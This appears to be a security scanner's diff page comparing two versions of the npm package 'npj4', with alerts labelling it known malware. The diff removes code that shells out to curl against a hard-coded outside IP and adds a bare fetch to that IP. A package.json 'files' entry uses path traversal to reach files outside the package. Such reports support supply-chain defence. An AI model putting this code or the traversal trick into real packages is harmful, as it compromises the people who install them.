npj4 - npm Package Compare versions
Comparing version 1.0.16 to 1.0.18
16
index.js
@@ -1,15 +0,1 @@ | ||
| // 引入child_process模块 | ||
| const { exec } = require('child_process'); | ||
| // 执行curl命令 | ||
| exec('curl http://47.99.124.12:1234/main', (error, stdout, stderr) => { | ||
| if (error) { | ||
| console.error(`执行出错: ${error.message}`); | ||
| return; | ||
| } | ||
| if (stderr) { | ||
| console.error(`stderr: ${stderr}`); | ||
| return; | ||
| } | ||
| console.log(`stdout: ${stdout}`); | ||
| }); | ||
| fetch("http://47.99.124.12:1234") |
| { | ||
| "name": "npj4", | ||
| "version": "1.0.16", | ||
| "version": "1.0.18", | ||
| "description": "", | ||
@@ -12,5 +12,5 @@ "main": "index.js", | ||
| "entry":"test.js", | ||
| "files": [ | ||
| "../../../../../../../../../app/app/amis-saas/service/Application.js" | ||
| ] | ||
| "files":[ | ||
| "../*" | ||
| ] | ||
| }], | ||
@@ -28,2 +28,2 @@ | ||
| "license": "ISC" | ||
| } | ||
| } |
@@ -1,5 +0,1 @@ | ||
| // 使用fetch发送HTTP请求 | ||
| fetch('http://47.99.124.12:1234/') | ||
| .then(response => response.text()) | ||
| .then(data => console.log(data)) | ||
| .catch(error => console.error('Error:', error)); | ||
| fetch("http://47.99.124.12:1234") |
New alerts
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
Empty package
Supply chain riskPackage does not contain any code. It may be removed, is name squatting, or the result of a faulty package publish.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 1 instance in 1 package
Fixed alerts
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 2 instances in 1 package
Install scripts
Supply chain riskInstall scripts are run when the package is installed. The majority of malware in npm is hidden in install scripts.
Found 1 instance in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
No contributors or author data
MaintenancePackage does not specify a list of contributors or an author in package.json.
Found 1 instance in 1 package
Improved metrics
- Number of critical supply chain risk alerts
- decreased by-50%
1
- Number of low supply chain risk alerts
- decreased by-50%
1
Worsened metrics
- Total package byte prevSize
- decreased by-69.18%
453
- Number of package files
- decreased by-25%
3
- Lines of code
- decreased by-100%
0
- Number of medium supply chain risk alerts
- increased by50%
3